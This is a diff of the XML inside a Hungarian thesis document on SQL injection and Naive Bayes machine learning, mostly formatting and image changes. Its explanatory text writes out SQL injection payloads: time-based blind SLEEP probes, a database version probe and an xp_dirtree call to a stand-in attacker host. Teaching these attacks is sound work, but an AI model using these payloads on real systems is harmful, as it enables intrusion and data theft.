+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az utolsó lépés a modell új adatokkal történő felhasználása</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>…</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A felügyelt gépi tanulási folyamatokban különféle algoritmusokat és számítási technikákat alkalmaznak.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AEA9450" wp14:editId="1DD0A883">
+            <wp:extent cx="5040000" cy="2431387"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="7620"/>
+            <wp:docPr id="2" name="Kép 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5040000" cy="2431387"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C494A7F" wp14:editId="7C0E4FC6">
+            <wp:extent cx="5040000" cy="2431387"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="7620"/>
+            <wp:docPr id="5" name="Kép 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 5"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5040000" cy="2431387"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7291,11 +8609,24 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc71020000"/>
-      <w:r>
-        <w:t>Naive Bayes</w:t>
+      <w:bookmarkStart w:id="14" w:name="_Toc71124915"/>
+      <w:r>
+        <w:t xml:space="preserve">Gaussian </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Naive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Bayes</w:t>
       </w:r>
       <w:bookmarkEnd w:id="14"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7308,11 +8639,115 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00C0F698" wp14:editId="652ADBD7">
+            <wp:extent cx="3600000" cy="2699894"/>
+            <wp:effectExtent l="0" t="0" r="635" b="5715"/>
+            <wp:docPr id="6" name="Kép 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="6" name="Kép 6"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3600000" cy="2699894"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E969CC9" wp14:editId="7174F277">
+            <wp:extent cx="3600000" cy="2699894"/>
+            <wp:effectExtent l="0" t="0" r="635" b="5715"/>
+            <wp:docPr id="8" name="Kép 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="8" name="Kép 8"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3600000" cy="2699894"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7332,7 +8767,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc71020001"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc71124916"/>
       <w:r>
         <w:t>PROGRAM FELÉPÍTÉSE</w:t>
       </w:r>
@@ -7363,7 +8798,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc71020002"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc71124917"/>
       <w:r>
         <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
       </w:r>
@@ -7422,7 +8857,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc71020003"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc71124918"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7485,7 +8920,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc71020004"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc71124919"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7670,7 +9105,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc71020005"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc71124920"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7705,9 +9140,9 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId11"/>
-      <w:footerReference w:type="default" r:id="rId12"/>
-      <w:headerReference w:type="first" r:id="rId13"/>
+      <w:headerReference w:type="default" r:id="rId15"/>
+      <w:footerReference w:type="default" r:id="rId16"/>
+      <w:headerReference w:type="first" r:id="rId17"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
       <w:cols w:space="708"/>
@@ -8191,6 +9626,92 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="17BF25FD"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="196484A2"/>
+    <w:lvl w:ilvl="0" w:tplc="040E000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1287" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="040E0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2007" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="040E001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2727" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="040E000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3447" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="040E0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4167" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="040E001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4887" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="040E000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5607" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="040E0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6327" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="040E001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="7047" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="17CE79CB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4490A8CE"/>
@@ -8303,7 +9824,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1FAF21C0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="6C0A3C60"/>
@@ -8425,7 +9946,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="20A815F0"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A81EF0F2"/>
@@ -8538,7 +10059,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="316417F3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="AE74433C"/>
@@ -8679,7 +10200,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="36260C9A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="25662176"/>
@@ -8792,7 +10313,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="61BF323C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EA52E50E"/>
@@ -8905,7 +10426,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66C264D6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CD9A3D8E"/>
@@ -9018,7 +10539,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="79BB3A78"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="76AE7DE8"/>
@@ -9135,34 +10656,37 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="3">
     <w:abstractNumId w:val="6"/>
   </w:num>
-  <w:num w:numId="3">
-    <w:abstractNumId w:val="5"/>
-  </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="6">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="7">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="8">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="9">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="12">
+    <w:abstractNumId w:val="3"/>
   </w:num>
 </w:numbering>
 </file>

</xml_diff>

<commit_message>
Rename validation_index to test_index
</commit_message>
<xml_diff>
--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -4575,7 +4575,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>, emellett adminisztrációs műveleteket hajthatnak végre az adatbázisban, a DBMS fájlban található adott fájl tartalmát helyreállíthatja a rendszerben, és egyes esetekben parancsokat adhat ki az operációs rendszernek</w:t>
+        <w:t xml:space="preserve">, emellett adminisztrációs műveleteket hajthatnak végre az adatbázisban, a DBMS fájlban található adott fájl tartalmát helyreállíthatja a rendszerben, és </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egyes esetekben</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> parancsokat adhat ki az operációs rendszernek</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6719,101 +6733,101 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>=1-SLEEP(15)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> [5]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">z injektálás lehetséges és a szerver a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>MySQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-t használja adatbázisként.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Következő lépésként például </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kinyerhető</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
-      </w:r>
+        <w:t>=1-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">SELECT * FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>SLEEP(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>card</w:t>
+        <w:t>15)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [5]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z injektálás lehetséges és a szerver a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-t használja adatbázisként.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Következő lépésként például </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kinyerhető</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> WHERE </w:t>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -6822,7 +6836,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>id</w:t>
+        <w:t>card</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -6831,7 +6845,43 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=1-IF(MID(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>VERSION(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>),1,1)=’5’, SLEEP(15),0)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7044,52 +7094,48 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>https://example.com/products.aspx?id=1;EXEC%20master..xp_dirtree%20'%5c%5ctest.attacker.com%5c'+--+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[6]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
